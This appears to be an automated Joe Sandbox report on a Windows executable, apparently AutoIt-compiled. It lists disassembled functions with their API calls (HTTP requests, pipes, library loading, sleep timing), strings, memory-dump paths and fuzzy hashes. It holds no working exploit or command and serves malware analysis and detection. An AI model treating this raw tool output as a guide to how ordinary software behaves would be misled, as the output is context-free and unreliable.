                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,003B2C7C,?), ref: 00377702
                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,003AFB80,000000FF,?,00000000,00000800,00000000,?,003B2C7C,?), ref: 00377727
                                                                                                                    • _memcmp.LIBCMT ref: 00377748
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                                                    • String ID: ,,;
                                                                                                                    • API String ID: 314563124-1177347100
                                                                                                                    • Opcode ID: fc4940976a1b969fbbe4da6c4f02d74ad399cc4f631ee430e639ddfde8e5bb78
                                                                                                                    • Instruction ID: a2e88c0d3c975683e8872f77d5eeafcc7eb44dd2b82fc14aff44473ced284f1b
                                                                                                                    • Opcode Fuzzy Hash: fc4940976a1b969fbbe4da6c4f02d74ad399cc4f631ee430e639ddfde8e5bb78
                                                                                                                    • Instruction Fuzzy Hash: EB813C75A00109EFCB15DFE4C984EEEB7B9FF89315F208158E509AB250DB75AE06CB60
                                                                                                                    Function 003985ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00398613
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00398722
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0039889A
                                                                                                                      • Part of subcall function 00387562: VariantInit.OLEAUT32(00000000), ref: 003875A2
                                                                                                                      • Part of subcall function 00387562: VariantCopy.OLEAUT32(00000000,?), ref: 003875AB
                                                                                                                      • Part of subcall function 00387562: VariantClear.OLEAUT32(00000000), ref: 003875B7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                    • API String ID: 4237274167-1221869570
                                                                                                                    • Opcode ID: 7c271ffc6c9cf01e8f22f82a36b74b9e5978f10025bbd116dfca05d01d9ad51d
                                                                                                                    • Instruction ID: 96726b73f0b323ab0aea1163761f8a3e32b69ef3bf249d0d22c28d400b373aba
                                                                                                                    • Opcode Fuzzy Hash: 7c271ffc6c9cf01e8f22f82a36b74b9e5978f10025bbd116dfca05d01d9ad51d
                                                                                                                    • Instruction Fuzzy Hash: AF917C716083019FCB11DF24C48495ABBE8EFCA714F14896EF99A8B361DB31E945CB92
                                                                                                                    Function 00382A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0033FC86: _wcscpy.LIBCMT ref: 0033FCA9
                                                                                                                    • _memset.LIBCMT ref: 00382B87
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00382BB6
                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00382C69
                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00382C97
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 4152858687-4108050209
                                                                                                                    • Opcode ID: 8fd98485b79d6ac5643a28a35917f502773bdacb05253f8530ddd5b41024a31b
                                                                                                                    • Instruction ID: eb39bac54ec626db0f2af4b3ae38da720d9690b730ce888beb6302a5ec484357
                                                                                                                    • Opcode Fuzzy Hash: 8fd98485b79d6ac5643a28a35917f502773bdacb05253f8530ddd5b41024a31b
                                                                                                                    • Instruction Fuzzy Hash: 6151BB716093009ED72BAE28D845A7FB7E8EF89310F150A6DF895DA2E0DB70DD448792
                                                                                                                    Function 00333137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$_free
                                                                                                                    • String ID: 3c3$_3
                                                                                                                    • API String ID: 2620147621-176681986
                                                                                                                    • Opcode ID: ccb992a9fa2c969f6f1224eb4460d59cc35741a10802d44ea17cf0ff1ae314a0
                                                                                                                    • Instruction ID: 4ef4d0a80383e884823469b0d77b5eff190cdb0ab0b40306179e1ddaa3d74d39
                                                                                                                    • Opcode Fuzzy Hash: ccb992a9fa2c969f6f1224eb4460d59cc35741a10802d44ea17cf0ff1ae314a0
                                                                                                                    • Instruction Fuzzy Hash: 60516E71A083418FDB26CF29C481B6ABBF5BF85350F45882DE589CB351DB35E941CB42
                                                                                                                    Function 00336192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$_memmove
                                                                                                                    • String ID: 3c3$ERCP
                                                                                                                    • API String ID: 2532777613-291258027
                                                                                                                    • Opcode ID: 35682f7ed5f5846044dcc7d6319985ef5567189a245cfb4d02aff785c2d86dd7
                                                                                                                    • Instruction ID: 1f1da7021f96ce0629139359d6ade6fdbb91dce63bddf51e9be2fb832950d3bd
                                                                                                                    • Opcode Fuzzy Hash: 35682f7ed5f5846044dcc7d6319985ef5567189a245cfb4d02aff785c2d86dd7
                                                                                                                    • Instruction Fuzzy Hash: C6519071900705EFDB26CF55C9827ABB7F8EF04314F21896EE54ADB291E774AA44CB40
                                                                                                                    Function 00382753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 003827C0
                                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003827DC
                                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00382822
                                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003E5890,00000000), ref: 0038286B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1173514356-4108050209
                                                                                                                    • Opcode ID: 6cb1b8d535c72311525de64e31a2a5830721d46e87c565f48d72a5fbefd4f788
                                                                                                                    • Instruction ID: 0396d85e938764a05973956bbb91725141d42ea0658c85c7beca0155ee6dfc92
                                                                                                                    • Opcode Fuzzy Hash: 6cb1b8d535c72311525de64e31a2a5830721d46e87c565f48d72a5fbefd4f788
                                                                                                                    • Instruction Fuzzy Hash: DE41B270604301AFDB22EF25CC44B1BBBE8EF85314F0549AEF8659B291D730E905CB52
                                                                                                                    Function 0039D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0039D7C5
                                                                                                                      • Part of subcall function 0032784B: _memmove.LIBCMT ref: 00327899
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharLower_memmove
                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                    • API String ID: 3425801089-567219261
                                                                                                                    • Opcode ID: 84824f08bdec38f9bfc49cf5c3dafd8f07883cac42ca03d32de35e9136aaa272
                                                                                                                    • Instruction ID: dfdbbfb43dcd54192a610c43961583e95a4b9efd87caa2d6d5c26c370c876b8e
                                                                                                                    • Opcode Fuzzy Hash: 84824f08bdec38f9bfc49cf5c3dafd8f07883cac42ca03d32de35e9136aaa272
                                                                                                                    • Instruction Fuzzy Hash: A531B475904219AFCF06EF54DC529FEB3B4FF05320B10862AE8259B7D2DB31A905CB80
                                                                                                                    Function 00378E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                      • Part of subcall function 0037AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0037AABC
                                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00378F14
                                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00378F27
                                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00378F57
                                                                                                                      • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$_memmove$ClassName
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 365058703-1403004172
                                                                                                                    • Opcode ID: 28549a7c9e4a0a7e8e96daa631c93ad07cf2f43df16232de283482bff0f4e048
                                                                                                                    • Instruction ID: 30c933b3cd374bae971f4195f084f25322a789447dc6a5ff197097e72d6dd245
                                                                                                                    • Opcode Fuzzy Hash: 28549a7c9e4a0a7e8e96daa631c93ad07cf2f43df16232de283482bff0f4e048
                                                                                                                    • Instruction Fuzzy Hash: 4F210471A44104BEDB26ABB0EC4ACFFB76DDF06320F048519F4299B2E0DF3949099650
                                                                                                                    Function 0039182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0039184C
                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00391872
                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003918A2
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 003918E9
                                                                                                                      • Part of subcall function 00392483: GetLastError.KERNEL32(?,?,00391817,00000000,00000000,00000001), ref: 00392498
                                                                                                                      • Part of subcall function 00392483: SetEvent.KERNEL32(?,?,00391817,00000000,00000000,00000001), ref: 003924AD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                    • Opcode ID: 94e0b2e925cb5926e32394a0e2d3c62a0b982c20fd86c70aec693e44778c253d
                                                                                                                    • Instruction ID: b7346ba63a6b546b6d939b303b82b06347b90377beb4b7a61af6d5e81246e739
                                                                                                                    • Opcode Fuzzy Hash: 94e0b2e925cb5926e32394a0e2d3c62a0b982c20fd86c70aec693e44778c253d
                                                                                                                    • Instruction Fuzzy Hash: EA21C2B6504309BFEF139F61DC85EBF77EDEB49744F10412AF805A6140DB219D0467A1
                                                                                                                    Function 003A63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00321D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00321D73
                                                                                                                      • Part of subcall function 00321D35: GetStockObject.GDI32(00000011), ref: 00321D87
                                                                                                                      • Part of subcall function 00321D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00321D91
                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003A6461
                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 003A6468
                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003A647D
                                                                                                                    • DestroyWindow.USER32(?), ref: 003A6485
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                    • String ID: SysAnimate32
                                                                                                                    • API String ID: 4146253029-1011021900
                                                                                                                    • Opcode ID: 36ad7a524e84d70d2af69906166ba3064b207f12f1de1a367083d7f4f34b6646
                                                                                                                    • Instruction ID: 4edd89d0e76b0015285392dc03b8b39f107cff24b9f47cbabf45edfd696aa298
                                                                                                                    • Opcode Fuzzy Hash: 36ad7a524e84d70d2af69906166ba3064b207f12f1de1a367083d7f4f34b6646
                                                                                                                    • Instruction Fuzzy Hash: 15219D71200205BFEF124FA5DC82EBB37ADEB5A328F194629FA10961E0D771DC51A760
                                                                                                                    Function 00386D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00386DBC
                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00386DEF
                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00386E01
                                                                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00386E3B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                    • Opcode ID: 4ce6008359ade0d7788d889dff8f614fcb3f822472d8f86d081733927529b4ea
                                                                                                                    • Instruction ID: 448733e0f780a12bbc1735d374fac8cd31d9d62afc7ae5fddc7add4172a87ca2
                                                                                                                    • Opcode Fuzzy Hash: 4ce6008359ade0d7788d889dff8f614fcb3f822472d8f86d081733927529b4ea
                                                                                                                    • Instruction Fuzzy Hash: 3221A475600309AFDB22AF69DC06B9A77F8EF85720F204A99FCA1D72D0D770A954CB50
                                                                                                                    Function 00386E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00386E89
                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00386EBB
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00386ECC
                                                                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00386F06
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                    • Opcode ID: da0df2b7a3d516b154a15f020578948e56f807759720449e10350ddb746c987c
                                                                                                                    • Instruction ID: f93dcae68abb58788a3474f0f2cfbe56eef67934cbfaf113afd458e12cdb6533
                                                                                                                    • Opcode Fuzzy Hash: da0df2b7a3d516b154a15f020578948e56f807759720449e10350ddb746c987c
                                                                                                                    • Instruction Fuzzy Hash: 3C21A1796003059FDB22AF69DD06A9A77B8EF45720F200A99FDE1D72D0DB70A850CB60
                                                                                                                    Function 0038AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0038AC54
                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0038ACA8
                                                                                                                    • __swprintf.LIBCMT ref: 0038ACC1
                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,003AF910), ref: 0038ACFF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                    • String ID: %lu
                                                                                                                    • API String ID: 3164766367-685833217
                                                                                                                    • Opcode ID: 6b2904aba03c25e732018ae0a38278df99a8b94cf2bb2738afff110971ad85f3
                                                                                                                    • Instruction ID: 2b49c0610cc09088b96c15f67c4c1fed5bd22eb2551250e6f35201db3e626ae7
                                                                                                                    • Opcode Fuzzy Hash: 6b2904aba03c25e732018ae0a38278df99a8b94cf2bb2738afff110971ad85f3
                                                                                                                    • Instruction Fuzzy Hash: D2217131A00209AFCB11EFA5D945EEE7BB8EF49714F0040A9F909DB251DB71EA41CB61
                                                                                                                    Function 00381142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0037FCED,?,00380D40,?,00008000), ref: 0038115F
                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0037FCED,?,00380D40,?,00008000), ref: 00381184
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0037FCED,?,00380D40,?,00008000), ref: 0038118E
                                                                                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,0037FCED,?,00380D40,?,00008000), ref: 003811C1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                    • String ID: @8
                                                                                                                    • API String ID: 2875609808-309826049
                                                                                                                    • Opcode ID: a2a138ea279da74df9034bca7f3c4de4145d50363872103b72dbf5704e6a0943
                                                                                                                    • Instruction ID: c792703ace2ea38896488277938edb59feecc6f89b56c1529ec32a0634c6e30b
                                                                                                                    • Opcode Fuzzy Hash: a2a138ea279da74df9034bca7f3c4de4145d50363872103b72dbf5704e6a0943
